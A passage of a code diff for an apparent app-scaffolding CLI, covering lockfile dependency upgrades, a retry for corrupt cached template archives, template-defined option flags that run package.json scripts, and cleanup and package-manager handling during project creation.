+      '@typescript-eslint/parser': 8.65.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3)
+      '@typescript-eslint/typescript-estree': 8.65.0(typescript@5.9.3)
+      '@typescript-eslint/utils': 8.65.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3)
+      eslint: 9.39.5(jiti@2.6.1)
       typescript: 5.9.3
     transitivePeerDependencies:
       - supports-color
@@ -6297,15 +5492,15 @@ snapshots:
 
   unbuild@3.6.1(typescript@5.9.3):
     dependencies:
-      '@rollup/plugin-alias': 5.1.1(rollup@4.52.5)
-      '@rollup/plugin-commonjs': 28.0.8(rollup@4.52.5)
-      '@rollup/plugin-json': 6.1.0(rollup@4.52.5)
-      '@rollup/plugin-node-resolve': 16.0.3(rollup@4.52.5)
-      '@rollup/plugin-replace': 6.0.2(rollup@4.52.5)
-      '@rollup/pluginutils': 5.3.0(rollup@4.52.5)
+      '@rollup/plugin-alias': 5.1.1(rollup@4.62.2)
+      '@rollup/plugin-commonjs': 28.0.8(rollup@4.62.2)
+      '@rollup/plugin-json': 6.1.0(rollup@4.62.2)
+      '@rollup/plugin-node-resolve': 16.0.3(rollup@4.62.2)
+      '@rollup/plugin-replace': 6.0.2(rollup@4.62.2)
+      '@rollup/pluginutils': 5.3.0(rollup@4.62.2)
       citty: 0.1.6
       consola: 3.4.2
-      defu: 6.1.4
+      defu: 6.1.7
       esbuild: 0.25.11
       fix-dts-default-cjs-exports: 1.0.1
       hookable: 5.5.3
@@ -6316,8 +5511,8 @@ snapshots:
       pathe: 2.0.3
       pkg-types: 2.3.0
       pretty-bytes: 7.1.0
-      rollup: 4.52.5
-      rollup-plugin-dts: 6.2.3(rollup@4.52.5)(typescript@5.9.3)
+      rollup: 4.62.2
+      rollup-plugin-dts: 6.2.3(rollup@4.62.2)(typescript@5.9.3)
       scule: 1.3.0
       tinyglobby: 0.2.15
       untyped: 2.0.0
@@ -6331,24 +5526,16 @@ snapshots:
 
   undici-types@7.16.0: {}
 
-  undici@5.29.0:
-    dependencies:
-      '@fastify/busboy': 2.1.1
-
-  undici@6.22.0: {}
-
   unist-util-stringify-position@2.0.3:
     dependencies:
       '@types/unist': 2.0.11
-
-  universal-user-agent@6.0.1: {}
 
   universalify@0.1.2: {}
 
   untyped@2.0.0:
     dependencies:
       citty: 0.1.6
-      defu: 6.1.4
+      defu: 6.1.7
       jiti: 2.4.2
       knitwork: 1.2.0
       scule: 1.3.0
@@ -6375,90 +5562,55 @@ snapshots:
       is-npm: 6.0.0
       latest-version: 9.0.0
       pupa: 3.1.0
-      semver: 7.7.2
+      semver: 7.8.5
       xdg-basedir: 5.1.0
 
   uri-js@4.4.1:
     dependencies:
       punycode: 2.3.1
 
-  url-join@5.0.0: {}
-
   util-deprecate@1.0.2: {}
 
-  validate-npm-package-name@5.0.1: {}
-
-  vite-node@3.2.4(@types/node@24.9.1)(jiti@2.6.1):
+  vite@6.4.3(@types/node@24.9.1)(jiti@2.6.1):
     dependencies:
-      cac: 6.7.14
-      debug: 4.4.3
-      es-module-lexer: 1.7.0
-      pathe: 2.0.3
-      vite: 6.1.0(@types/node@24.9.1)(jiti@2.6.1)
-    transitivePeerDependencies:
-      - '@types/node'
-      - jiti
-      - less
-      - lightningcss
-      - sass
-      - sass-embedded
-      - stylus
-      - sugarss
-      - supports-color
-      - terser
-      - tsx
-      - yaml
-
-  vite@6.1.0(@types/node@24.9.1)(jiti@2.6.1):
-    dependencies:
-      esbuild: 0.24.2
-      postcss: 8.5.1
-      rollup: 4.34.6
+      esbuild: 0.25.11
+      fdir: 6.5.0(picomatch@4.0.5)
+      picomatch: 4.0.5
+      postcss: 8.5.21
+      rollup: 4.62.2
+      tinyglobby: 0.2.15
     optionalDependencies:
       '@types/node': 24.9.1
       fsevents: 2.3.3
       jiti: 2.6.1
 
-  vitest@3.2.4(@types/node@24.9.1)(jiti@2.6.1):
+  vitest@4.1.10(@types/node@24.9.1)(@vitest/coverage-v8@4.1.10)(vite@6.4.3(@types/node@24.9.1)(jiti@2.6.1)):
     dependencies:
-      '@types/chai': 5.2.3
-      '@vitest/expect': 3.2.4
-      '@vitest/mocker': 3.2.4(vite@6.1.0(@types/node@24.9.1)(jiti@2.6.1))
-      '@vitest/pretty-format': 3.2.4
-      '@vitest/runner': 3.2.4
-      '@vitest/snapshot': 3.2.4
-      '@vitest/spy': 3.2.4
-      '@vitest/utils': 3.2.4
-      chai: 5.3.3
-      debug: 4.4.3
-      expect-type: 1.2.2
-      magic-string: 0.30.17
+      '@vitest/expect': 4.1.10
+      '@vitest/mocker': 4.1.10(vite@6.4.3(@types/node@24.9.1)(jiti@2.6.1))
+      '@vitest/pretty-format': 4.1.10
+      '@vitest/runner': 4.1.10
+      '@vitest/snapshot': 4.1.10
+      '@vitest/spy': 4.1.10
+      '@vitest/utils': 4.1.10
+      es-module-lexer: 2.3.1
+      expect-type: 1.4.0
+      magic-string: 0.30.21
+      obug: 2.1.4
       pathe: 2.0.3
-      picomatch: 4.0.2
-      std-env: 3.10.0
+      picomatch: 4.0.5
+      std-env: 4.2.0
       tinybench: 2.9.0
-      tinyexec: 0.3.2
+      tinyexec: 1.2.4
       tinyglobby: 0.2.15
-      tinypool: 1.1.1
-      tinyrainbow: 2.0.0
-      vite: 6.1.0(@types/node@24.9.1)(jiti@2.6.1)
-      vite-node: 3.2.4(@types/node@24.9.1)(jiti@2.6.1)
+      tinyrainbow: 3.1.0
+      vite: 6.4.3(@types/node@24.9.1)(jiti@2.6.1)
       why-is-node-running: 2.3.0
     optionalDependencies:
       '@types/node': 24.9.1
+      '@vitest/coverage-v8': 4.1.10(vitest@4.1.10)
     transitivePeerDependencies:
-      - jiti
-      - less
-      - lightningcss
       - msw
-      - sass
-      - sass-embedded
-      - stylus
-      - sugarss
-      - supports-color
-      - terser
-      - tsx
-      - yaml
 
   webidl-conversions@3.0.1: {}
 
@@ -6488,12 +5640,6 @@ snapshots:
 
   word-wrap@1.2.5: {}
 
-  wrap-ansi@7.0.0:
-    dependencies:
-      ansi-styles: 4.3.0
-      string-width: 4.2.3
-      strip-ansi: 6.0.1
-
   wrap-ansi@8.1.0:
     dependencies:
       ansi-styles: 6.2.1
@@ -6506,18 +5652,8 @@ snapshots:
       string-width: 7.2.0
       strip-ansi: 7.1.0
 
-  wrappy@1.0.2: {}
-
   xdg-basedir@5.1.0: {}
 
   yocto-queue@0.1.0: {}
 
-  zod-package-json@1.2.0:
-    dependencies:
-      zod: 3.25.76
-
-  zod@3.24.1: {}
-
-  zod@3.25.76: {}
-
-  zod@4.1.5: {}
+  zod@4.4.3: {}

--- a/pnpm-workspace.yaml
+++ b/pnpm-workspace.yaml
@@ -1,0 +1,1 @@
+minimumReleaseAge: 7200

--- a/src/index.ts
+++ b/src/index.ts
@@ -16,10 +16,36 @@ export { getAppInfo } from './utils/get-app-info'
 export type { AppInfo } from './utils/get-app-info'
 export { getArgs } from './utils/get-args'
 export type { GetArgsResult } from './utils/get-args-result'
+export {
+  initScriptKey,
+  InitScriptSchema,
+  InitScriptSchemaInstructions,
+  InitScriptSchemaOption,
+  InitScriptSchemaOptions,
+  InitScriptSchemaPackageManager,
+  InitScriptSchemaRename,
+  InitScriptSchemaSkills,
+  InitScriptSchemaVersions,
+} from './utils/init-script-schema'
+export type {
+  InitScriptInstructions,
+  InitScriptOption,
+  InitScriptOptions,
+  InitScriptPackageManager,
+  InitScriptRename,
+  InitScriptSkills,
+  InitScriptVersions,
+} from './utils/init-script-schema'
 export { listTemplateIds } from './utils/list-template-ids'
 export { listTemplates } from './utils/list-templates'
 export { listVersions } from './utils/list-versions'
 export type { Template } from './utils/template'
+export {
+  parseTemplateJson,
+  templateJsonGroupSchema,
+  templateJsonSchema,
+  templateJsonTemplateSchema,
+} from './utils/template-schema'
 export type {
   MenuConfig,
   MenuConfigItem,

--- a/src/utils/corrupt-archive-error.ts
+++ b/src/utils/corrupt-archive-error.ts
@@ -1,0 +1,46 @@
+import { homedir, tmpdir } from 'node:os'
+import { resolve } from 'node:path'
+
+/**
+ * Detects the errors thrown when the template tarball giget hands to `tar` is
+ * truncated or otherwise not a valid gzip archive.
+ *
+ * giget caches every template tarball. When a download is interrupted it leaves
+ * a partial file behind, and on the next run its download error handler falls
+ * back to that cached file instead of failing, so the corrupt archive is
+ * extracted and `tar` reports a low-level zlib failure (see #256).
+ */
+export function isCorruptArchiveError(error: unknown): boolean {
+  const code = (error as { code?: unknown })?.code
+  if (code === 'TAR_BAD_ARCHIVE' || code === 'Z_BUF_ERROR' || code === 'Z_DATA_ERROR') {
+    return true
+  }
+  const name = (error as { name?: unknown })?.name
+  const message = `${(error as { message?: unknown })?.message ?? error}`
+  return name === 'ZlibError' || /zlib|unexpected end of file|not a gzip|invalid distance/i.test(message)
+}
+
+/**
+ * The directory giget caches template tarballs in.
+ *
+ * Mirrors giget's own resolution so the recovery hint we print points at the
+ * directory the user actually needs to clear.
+ */
+export function templateCacheDirectory(): string {
+  if (process.platform === 'win32') {
+    return resolve(tmpdir(), 'giget')
+  }
+  return process.env.XDG_CACHE_HOME ? resolve(process.env.XDG_CACHE_HOME, 'giget') : resolve(homedir(), '.cache/giget')
+}
+
+/**
+ * Actionable message for a corrupt cached template archive, replacing the bare
+ * `ZlibError: zlib: unexpected end of file` that leaves users guessing (the
+ * reporter in #256 tried installing zlib).
+ */
+export function corruptArchiveMessage(templateId: string): string {
+  return [
+    `The cached archive for template ${templateId} is corrupt, most likely from an interrupted download.`,
+    `Delete the template cache and try again: ${templateCacheDirectory()}`,
+  ].join(' ')
+}

--- a/src/utils/create-app-task-clone-template.ts
+++ b/src/utils/create-app-task-clone-template.ts
@@ -2,8 +2,43 @@ import { log } from '@clack/prompts'
 import { downloadTemplate } from 'giget'
 import { cpSync, existsSync, mkdirSync } from 'node:fs'
 import { readdir } from 'node:fs/promises'
+import { corruptArchiveMessage, isCorruptArchiveError } from './corrupt-archive-error'
 import { GetArgsResult } from './get-args-result'
 import { Task, taskFail } from './vendor/clack-tasks'
+
+/**
+ * Downloads the template, retrying once when the cached tarball turns out to be
+ * corrupt (#256).
+ *
+ * giget only re-downloads when the previous attempt is not reused: if a partial
+ * tarball is already cached and the download errors, giget silently extracts the
+ * partial file and `tar` fails with a zlib error. A second attempt re-runs the
+ * download, which overwrites the poisoned cache entry when the network
+ * cooperates; if it does not, the user gets an actionable message instead of a
+ * bare `ZlibError`.
+ */
+async function downloadTemplateWithRetry(args: GetArgsResult) {
+  try {
+    return await downloadTemplate(args.template.id, { dir: args.targetDirectory })
+  } catch (error) {
+    if (!isCorruptArchiveError(error)) {
+      throw error
+    }
+    if (args.verbose) {
+      log.warn(`Cached template archive was corrupt, retrying download: ${error}`)
+    }
+    try {
+      // `forceClean` clears the partially extracted target directory the failed
+      // attempt may have left behind.
+      return await downloadTemplate(args.template.id, { dir: args.targetDirectory, forceClean: true })
+    } catch (retryError) {
+      if (isCorruptArchiveError(retryError)) {
+        throw new Error(corruptArchiveMessage(args.template.id))
+      }
+      throw retryError
+    }
+  }
+}
 
 export function createAppTaskCloneTemplate(args: GetArgsResult): Task {
   return {
@@ -45,10 +80,7 @@ export function createAppTaskCloneTemplate(args: GetArgsResult): Task {
 
           dir = args.targetDirectory
         } else {
-          const downloadResult = await downloadTemplate(args.template.id, {
-            dir: args.targetDirectory,
-          })
-          dir = downloadResult.dir
+          dir = (await downloadTemplateWithRetry(args)).dir
         }
 
         // make sure the dir is not empty

--- a/src/utils/create-app-task-install-dependencies.ts
+++ b/src/utils/create-app-task-install-dependencies.ts
@@ -1,5 +1,6 @@
 import { log } from '@clack/prompts'
 import { existsSync } from 'node:fs'
+import { rm } from 'node:fs/promises'
 import { join } from 'node:path'
 import { GetArgsResult } from './get-args-result'
 import { execAndWait } from './vendor/child-process-utils'
@@ -25,7 +26,7 @@ export function createAppTaskInstallDependencies(args: GetArgsResult): Task {
         if (args.verbose) {
           log.warn(`Deleting ${lockFile}`)
         }
-        await execAndWait(`rm ${lockFile}`, args.targetDirectory)
+        await rm(join(args.targetDirectory, lockFile), { force: true })
       }
       if (args.verbose) {
         log.warn(`Running ${install}`)

--- a/src/utils/create-app-task-install-skills.ts
+++ b/src/utils/create-app-task-install-skills.ts
@@ -7,7 +7,7 @@ import { Task } from './vendor/clack-tasks'
 
 const defaultSkills = ['https://github.com/solana-foundation/solana-dev-skill']
 
-export function createAppTaskInstallDevSkill(args: GetArgsResult): Task {
+export function createAppTaskInstallSkills(args: GetArgsResult): Task {
   return {
     enabled: !args.skipInstall,
     task: async (result) => {

--- a/src/utils/create-app-task-run-init-script.ts
+++ b/src/utils/create-app-task-run-init-script.ts
@@ -3,6 +3,7 @@ import { GetArgsResult } from './get-args-result'
 import { getPackageJson } from './get-package-json'
 import { initScriptDelete } from './init-script-delete'
 import { initScriptInstructions } from './init-script-instructions'
+import { initScriptOptions } from './init-script-options'
 import { initScriptRename } from './init-script-rename'
 import { initScriptKey } from './init-script-schema'
 import { initScriptVersion } from './init-script-version'
@@ -24,9 +25,14 @@ export function createAppTaskRunInitScript(args: GetArgsResult): Task {
 
         await initScriptVersion(init.versions, args.verbose)
 
+        const optionInstructions = await initScriptOptions(args, init.options)
+
         await initScriptRename(args, init.rename, args.verbose)
 
-        const instructions: string[] = initScriptInstructions(init.instructions, args.verbose)
+        const instructions: string[] = initScriptInstructions(
+          [...optionInstructions, ...(init.instructions ?? [])],
+          args.verbose,
+        )
           ?.filter(Boolean)
           .map((msg) => msg.replace('{pm}', args.packageManager))
 

--- a/src/utils/create-app-task-run-init-script.ts
+++ b/src/utils/create-app-task-run-init-script.ts
@@ -1,21 +1,29 @@
 import { log } from '@clack/prompts'
 import { GetArgsResult } from './get-args-result'
-import { getPackageJson } from './get-package-json'
 import { initScriptDelete } from './init-script-delete'
 import { initScriptInstructions } from './init-script-instructions'
-import { initScriptOptions } from './init-script-options'
+import { initScriptOptions, SelectedTemplateOption } from './init-script-options'
 import { initScriptRename } from './init-script-rename'
-import { initScriptKey } from './init-script-schema'
+import { InitScript } from './init-script-schema'
 import { initScriptVersion } from './init-script-version'
 import { Task, taskFail } from './vendor/clack-tasks'
 
-export function createAppTaskRunInitScript(args: GetArgsResult): Task {
+/**
+ * Applies the init script.
+ *
+ * The init script and the selected options are both snapshotted before the
+ * template option scripts run, so a script that rewrites package.json cannot
+ * drop the transformations this task is meant to apply.
+ */
+export function createAppTaskRunInitScript(
+  args: GetArgsResult,
+  init: InitScript | undefined,
+  options: SelectedTemplateOption[],
+): Task {
   return {
     enabled: !args.skipInit,
     task: async (result) => {
       try {
-        const { contents } = getPackageJson(args.targetDirectory)
-        const init = contents[initScriptKey]
         if (!init) {
           return result({ message: 'Init script not found' })
         }
@@ -25,7 +33,7 @@ export function createAppTaskRunInitScript(args: GetArgsResult): Task {
 
         await initScriptVersion(init.versions, args.verbose)
 
-        const optionInstructions = await initScriptOptions(args, init.options)
+        const optionInstructions = await initScriptOptions(args, options)
 
         await initScriptRename(args, init.rename, args.verbose)
 

--- a/src/utils/create-app-task-run-option-script.ts
+++ b/src/utils/create-app-task-run-option-script.ts
@@ -1,0 +1,57 @@
+import { log } from '@clack/prompts'
+import { GetArgsResult } from './get-args-result'
+import { getPackageJson } from './get-package-json'
+import { SelectedTemplateOption } from './init-script-options'
+import { execAndWait } from './vendor/child-process-utils'
+import { Task, taskFail } from './vendor/clack-tasks'
+
+/**
+ * Runs the package.json scripts declared by the selected template options.
+ *
+ * This happens before dependencies are installed so a script that trims
+ * package.json is reflected in the lockfile and node_modules, and before the
+ * init script so any files it writes are still renamed.
+ */
+export function createAppTaskRunOptionScript(args: GetArgsResult, options: SelectedTemplateOption[]): Task {
+  const selected = options.filter((option) => option.value.run)
+
+  return {
+    enabled: !args.skipInit && selected.length > 0,
+    task: async (result) => {
+      try {
+        const { contents } = getPackageJson(args.targetDirectory)
+
+        for (const option of selected) {
+          const { run } = option.value
+          if (!run) {
+            continue
+          }
+
+          // Only the script name is validated here, the rest of the value is passed through as
+          // arguments. The schema already rejects shell metacharacters, so collapsing whitespace runs
+          // to single spaces cannot corrupt a quoted argument and a newline cannot end the command.
+          const command = run.trim().split(/\s+/).join(' ')
+          const [script] = command.split(' ')
+          if (!contents.scripts?.[script]) {
+            throw new Error(`Template option --${option.name} requires a "${script}" script in package.json`)
+          }
+
+          if (args.verbose) {
+            log.warn(`Running ${args.packageManager} run ${command}`)
+          }
+
+          const { stdout } = await execAndWait(`${args.packageManager} run ${command}`, args.targetDirectory)
+
+          if (args.verbose && stdout.trim().length > 0) {
+            log.warn(stdout.trim())
+          }
+        }
+
+        return result({ message: `Ran ${selected.map((option) => `--${option.name}`).join(', ')}` })
+      } catch (error) {
+        taskFail(`Error running template option script: ${error}`)
+      }
+    },
+    title: 'Running template option scripts',
+  }
+}

--- a/src/utils/create-app.ts
+++ b/src/utils/create-app.ts
@@ -1,3 +1,5 @@
+import { log } from '@clack/prompts'
+import { existsSync } from 'node:fs'
 import { createAppTaskCloneTemplate } from './create-app-task-clone-template'
 import { createAppTaskInitializeGit } from './create-app-task-initialize-git'
 import { createAppTaskInstallDependencies } from './create-app-task-install-dependencies'
@@ -5,7 +7,9 @@ import { createAppTaskInstallSkills } from './create-app-task-install-skills'
 import { createAppTaskRunInitScript } from './create-app-task-run-init-script'
 import { createAppTaskRunSetup } from './create-app-task-run-setup'
 import { type GetArgsResult } from './get-args-result'
+import { getPackageJsonPath } from './get-package-json-path'
 import { initScriptPackageManager } from './init-script-package-manager'
+import { removeIncompatiblePackageManager } from './remove-incompatible-package-manager'
 import { tasks } from './vendor/clack-tasks'
 
 export type CreateAppArgs = GetArgsResult
@@ -18,6 +22,21 @@ export async function createApp(args: CreateAppArgs): Promise<CreateAppResult> {
   ])
 
   initScriptPackageManager(args)
+
+  // Remove an incompatible `packageManager` field from the template's
+  // package.json so the effective package manager can install. This runs
+  // AFTER initScriptPackageManager so a template-configured package manager
+  // takes precedence: args.packageManager already reflects the template's
+  // choice here, and a matching pin is left in place. Runs during setup so
+  // it applies even when install is skipped.
+  if (existsSync(getPackageJsonPath(args.targetDirectory))) {
+    const removedPackageManager = removeIncompatiblePackageManager(args.targetDirectory, args.packageManager)
+    if (removedPackageManager) {
+      log.warn(
+        `Removed \`packageManager\` (${removedPackageManager}) from package.json as it does not match the selected package manager (${args.packageManager}); this may indicate potential incompatibilities with the template.`,
+      )
+    }
+  }
 
   return [
     ...instructions,

--- a/src/utils/create-app.ts
+++ b/src/utils/create-app.ts
@@ -1,7 +1,7 @@
 import { createAppTaskCloneTemplate } from './create-app-task-clone-template'
 import { createAppTaskInitializeGit } from './create-app-task-initialize-git'
 import { createAppTaskInstallDependencies } from './create-app-task-install-dependencies'
-import { createAppTaskInstallDevSkill } from './create-app-task-install-dev-skill'
+import { createAppTaskInstallSkills } from './create-app-task-install-skills'
 import { createAppTaskRunInitScript } from './create-app-task-run-init-script'
 import { createAppTaskRunSetup } from './create-app-task-run-setup'
 import { type GetArgsResult } from './get-args-result'
@@ -27,7 +27,7 @@ export async function createApp(args: CreateAppArgs): Promise<CreateAppResult> {
       // Run the (optional) setup script defined in package.json (e.g. build anchor program)
       createAppTaskRunSetup(args),
       // Install skills for AI coding agents
-      createAppTaskInstallDevSkill(args),
+      createAppTaskInstallSkills(args),
       // Run the (optional) init script defined in package.json
       createAppTaskRunInitScript(args),
       // Initialize git repository

--- a/src/utils/create-app.ts
+++ b/src/utils/create-app.ts
@@ -1,14 +1,18 @@
 import { log } from '@clack/prompts'
-import { existsSync } from 'node:fs'
+import { existsSync, rmSync } from 'node:fs'
 import { createAppTaskCloneTemplate } from './create-app-task-clone-template'
 import { createAppTaskInitializeGit } from './create-app-task-initialize-git'
 import { createAppTaskInstallDependencies } from './create-app-task-install-dependencies'
 import { createAppTaskInstallSkills } from './create-app-task-install-skills'
 import { createAppTaskRunInitScript } from './create-app-task-run-init-script'
+import { createAppTaskRunOptionScript } from './create-app-task-run-option-script'
 import { createAppTaskRunSetup } from './create-app-task-run-setup'
 import { type GetArgsResult } from './get-args-result'
+import { getPackageJson } from './get-package-json'
 import { getPackageJsonPath } from './get-package-json-path'
+import { resolveInitScriptOptions } from './init-script-options'
 import { initScriptPackageManager } from './init-script-package-manager'
+import { initScriptKey } from './init-script-schema'
 import { removeIncompatiblePackageManager } from './remove-incompatible-package-manager'
 import { tasks } from './vendor/clack-tasks'
 
@@ -16,41 +20,61 @@ export type CreateAppArgs = GetArgsResult
 export type CreateAppResult = string[]
 
 export async function createApp(args: CreateAppArgs): Promise<CreateAppResult> {
-  const instructions = await tasks([
-    // Clone the template to the target directory
-    createAppTaskCloneTemplate(args),
-  ])
+  // A directory that was already there is not ours to remove when a task fails
+  const targetExisted = existsSync(args.targetDirectory)
 
-  initScriptPackageManager(args)
+  try {
+    const instructions = await tasks([
+      // Clone the template to the target directory
+      createAppTaskCloneTemplate(args),
+    ])
 
-  // Remove an incompatible `packageManager` field from the template's
-  // package.json so the effective package manager can install. This runs
-  // AFTER initScriptPackageManager so a template-configured package manager
-  // takes precedence: args.packageManager already reflects the template's
-  // choice here, and a matching pin is left in place. Runs during setup so
-  // it applies even when install is skipped.
-  if (existsSync(getPackageJsonPath(args.targetDirectory))) {
-    const removedPackageManager = removeIncompatiblePackageManager(args.targetDirectory, args.packageManager)
-    if (removedPackageManager) {
-      log.warn(
-        `Removed \`packageManager\` (${removedPackageManager}) from package.json as it does not match the selected package manager (${args.packageManager}); this may indicate potential incompatibilities with the template.`,
-      )
+    initScriptPackageManager(args)
+
+    // Remove an incompatible `packageManager` field from the template's
+    // package.json so the effective package manager can install. This runs
+    // AFTER initScriptPackageManager so a template-configured package manager
+    // takes precedence: args.packageManager already reflects the template's
+    // choice here, and a matching pin is left in place. Runs during setup so
+    // it applies even when install is skipped, and before the template option
+    // scripts so they are not run through an incompatible package manager.
+    if (existsSync(getPackageJsonPath(args.targetDirectory))) {
+      const removedPackageManager = removeIncompatiblePackageManager(args.targetDirectory, args.packageManager)
+      if (removedPackageManager) {
+        log.warn(
+          `Removed \`packageManager\` (${removedPackageManager}) from package.json as it does not match the selected package manager (${args.packageManager}); this may indicate potential incompatibilities with the template.`,
+        )
+      }
     }
-  }
 
-  return [
-    ...instructions,
-    ...(await tasks([
-      // Install the dependencies
-      createAppTaskInstallDependencies(args),
-      // Run the (optional) setup script defined in package.json (e.g. build anchor program)
-      createAppTaskRunSetup(args),
-      // Install skills for AI coding agents
-      createAppTaskInstallSkills(args),
-      // Run the (optional) init script defined in package.json
-      createAppTaskRunInitScript(args),
-      // Initialize git repository
-      createAppTaskInitializeGit(args),
-    ])),
-  ]
+    // Snapshot the init script and resolve the selected options before any template option script
+    // runs, so the flags are validated before work is done and a script that rewrites package.json
+    // cannot drop the renames and instructions the init script is meant to apply
+    const { contents } = getPackageJson(args.targetDirectory)
+    const init = contents[initScriptKey]
+    const options = args.skipInit ? [] : resolveInitScriptOptions(init?.options, args.templateOptions ?? [])
+
+    return [
+      ...instructions,
+      ...(await tasks([
+        // Run the (optional) scripts declared by the selected template options
+        createAppTaskRunOptionScript(args, options),
+        // Install the dependencies
+        createAppTaskInstallDependencies(args),
+        // Run the (optional) setup script defined in package.json (e.g. build anchor program)
+        createAppTaskRunSetup(args),
+        // Install skills for AI coding agents
+        createAppTaskInstallSkills(args),
+        // Run the (optional) init script defined in package.json
+        createAppTaskRunInitScript(args, init, options),
+        // Initialize git repository
+        createAppTaskInitializeGit(args),
+      ])),
+    ]
+  } catch (error) {
+    if (!targetExisted) {
+      rmSync(args.targetDirectory, { force: true, recursive: true })
+    }
+    throw error
+  }
 }

--- a/src/utils/extract-template-option-flags.ts
+++ b/src/utils/extract-template-option-flags.ts
@@ -1,0 +1,74 @@
+import { Command } from 'commander'
+
+const templateOptionPattern = /^--([a-z][a-z0-9-]*)$/
+
+export interface ExtractTemplateOptionFlagsResult {
+  readonly argv: string[]
+  readonly templateOptions: string[]
+}
+
+/**
+ * Separates template-defined boolean flags from the arguments Commander knows.
+ *
+ * Template flags are validated after the selected template has been cloned and
+ * its package metadata is available.
+ */
+export function extractTemplateOptionFlags(command: Command, argv: string[]): ExtractTemplateOptionFlagsResult {
+  const knownArgv = argv.slice(0, 2)
+  const templateOptions = new Set<string>()
+  let preserveNextArgument = false
+  let positionalOnly = false
+
+  for (const arg of argv.slice(2)) {
+    if (positionalOnly || preserveNextArgument) {
+      knownArgv.push(arg)
+      preserveNextArgument = false
+      continue
+    }
+
+    if (arg === '--') {
+      positionalOnly = true
+      knownArgv.push(arg)
+      continue
+    }
+
+    const knownOption = findKnownOption(command, arg)
+    if (knownOption) {
+      knownArgv.push(arg)
+      preserveNextArgument = knownOption.required && !hasInlineValue(knownOption.long, knownOption.short, arg)
+      continue
+    }
+
+    if (!arg.startsWith('-')) {
+      knownArgv.push(arg)
+      continue
+    }
+
+    const match = templateOptionPattern.exec(arg)
+    if (!match) {
+      throw new Error(`Template options must be boolean long flags such as --ollama; received "${arg}".`)
+    }
+    templateOptions.add(match[1])
+  }
+
+  return {
+    argv: knownArgv,
+    templateOptions: [...templateOptions],
+  }
+}
+
+function findKnownOption(command: Command, arg: string) {
+  const longFlag = arg.startsWith('--') ? arg.split('=', 1)[0] : undefined
+  const shortFlag = arg.startsWith('-') && !arg.startsWith('--') ? arg.slice(0, 2) : undefined
+  return command.options.find(
+    (option) =>
+      (longFlag !== undefined && option.long === longFlag) || (shortFlag !== undefined && option.short === shortFlag),
+  )
+}
+
+function hasInlineValue(longFlag: string | undefined, shortFlag: string | undefined, arg: string): boolean {
+  if (longFlag !== undefined && arg.startsWith('--')) {
+    return arg.startsWith(`${longFlag}=`)
+  }
+  return shortFlag !== undefined && arg.startsWith(shortFlag) && arg !== shortFlag
+}

--- a/src/utils/get-args-result.ts
+++ b/src/utils/get-args-result.ts
@@ -7,6 +7,7 @@ export interface GetArgsResult {
   dryRun: boolean
   name: string
   packageManager: PackageManager
+  /** Treated as true when omitted by programmatic callers. */
   packageManagerExplicit?: boolean
   skipGit: boolean
   skipInit: boolean

--- a/src/utils/get-args-result.ts
+++ b/src/utils/get-args-result.ts
@@ -14,5 +14,7 @@ export interface GetArgsResult {
   skipInstall: boolean
   targetDirectory: string
   template: Template
+  /** Boolean template-defined flags selected on the command line. */
+  templateOptions?: string[]
   verbose: boolean
 }

--- a/src/utils/get-args.ts
+++ b/src/utils/get-args.ts
@@ -1,6 +1,7 @@
 import { intro, log, outro } from '@clack/prompts'
 import { Command } from 'commander'
 import * as process from 'node:process'
+import { extractTemplateOptionFlags } from './extract-template-option-flags'
 import { fetchTemplateData } from './fetch-template-data'
 import { findTemplate } from './find-template'
 import { AppInfo } from './get-app-info'
@@ -49,7 +50,9 @@ Examples:
   $ ${app.name} my-app --pnpm # or --yarn
       `,
     )
-    .parse(argv)
+
+  const { argv: knownArgv, templateOptions } = extractTemplateOptionFlags(input, argv)
+  input.parse(knownArgv)
 
   // Get the optional name argument (positional)
   const name = input.args[0]
@@ -131,6 +134,7 @@ Examples:
     skipInstall: result.skipInstall ?? false,
     targetDirectory: `${cwd}/${name}`,
     template,
+    templateOptions,
     verbose,
   }
 

--- a/src/utils/get-package-json.ts
+++ b/src/utils/get-package-json.ts
@@ -27,6 +27,7 @@ const PackageJsonSchema = z
   .object({
     [initScriptKey]: InitScriptSchema.optional(),
     name: z.string().optional(),
+    packageManager: z.string().optional(),
     scripts: z.record(z.string()).optional(),
   })
   .passthrough()

--- a/src/utils/get-package-json.ts
+++ b/src/utils/get-package-json.ts
@@ -1,5 +1,5 @@
 import { existsSync, readFileSync } from 'node:fs'
-import { z } from 'zod/v3'
+import { z } from 'zod'
 import { getPackageJsonPath } from './get-package-json-path'
 import { initScriptKey, InitScriptSchema } from './init-script-schema'
 
@@ -23,13 +23,11 @@ export function getPackageJson(targetDirectory: string): { contents: PackageJson
   return { contents: parsed.data, path }
 }
 
-const PackageJsonSchema = z
-  .object({
-    [initScriptKey]: InitScriptSchema.optional(),
-    name: z.string().optional(),
-    packageManager: z.string().optional(),
-    scripts: z.record(z.string()).optional(),
-  })
-  .passthrough()
+const PackageJsonSchema = z.looseObject({
+  [initScriptKey]: InitScriptSchema.optional(),
+  name: z.string().optional(),
+  packageManager: z.string().optional(),
+  scripts: z.record(z.string(), z.string()).optional(),
+})
 
 export type PackageJson = z.infer<typeof PackageJsonSchema>

--- a/src/utils/get-prompt-name.ts
+++ b/src/utils/get-prompt-name.ts
@@ -10,7 +10,7 @@ export function getPromptName({ options }: { options: GetArgsResult }) {
     }
     return text({
       message: 'Enter project name',
-      validate: validateProjectName,
+      validate: (name) => validateProjectName(name ?? ''),
     })
   }
 }

--- a/src/utils/get-prompt-name.ts
+++ b/src/utils/get-prompt-name.ts
@@ -1,14 +1,28 @@
 import { log, text } from '@clack/prompts'
 import { GetArgsResult } from './get-args-result'
-import { validateProjectName } from './validate-project-name'
+import { Template } from './template'
+import { isValidProjectNameFormat, validateProjectName } from './validate-project-name'
+
+// Templates from the registry are named with a plain slug, but external (`org/repo`) and local
+// (`./path`) templates keep their raw reference as the name, so take the last path segment. Anything
+// that still isn't a usable directory name is dropped rather than rewritten: an invalid pre-fill is
+// worse than none, because it has to be cleared before the prompt will accept anything.
+function getInitialValue(template?: Template): string | undefined {
+  const candidate = template?.name.replace(/\/+$/, '').split('/').pop()
+
+  return candidate && isValidProjectNameFormat(candidate) ? candidate : undefined
+}
 
 export function getPromptName({ options }: { options: GetArgsResult }) {
-  return () => {
+  return ({ results }: { results: { template?: Template } }) => {
     if (options.name) {
       log.success(`Project name: ${options.name}`)
       return Promise.resolve(options.name)
     }
     return text({
+      // Pre-fill from the template selected in the previous prompt, so accepting the defaults all
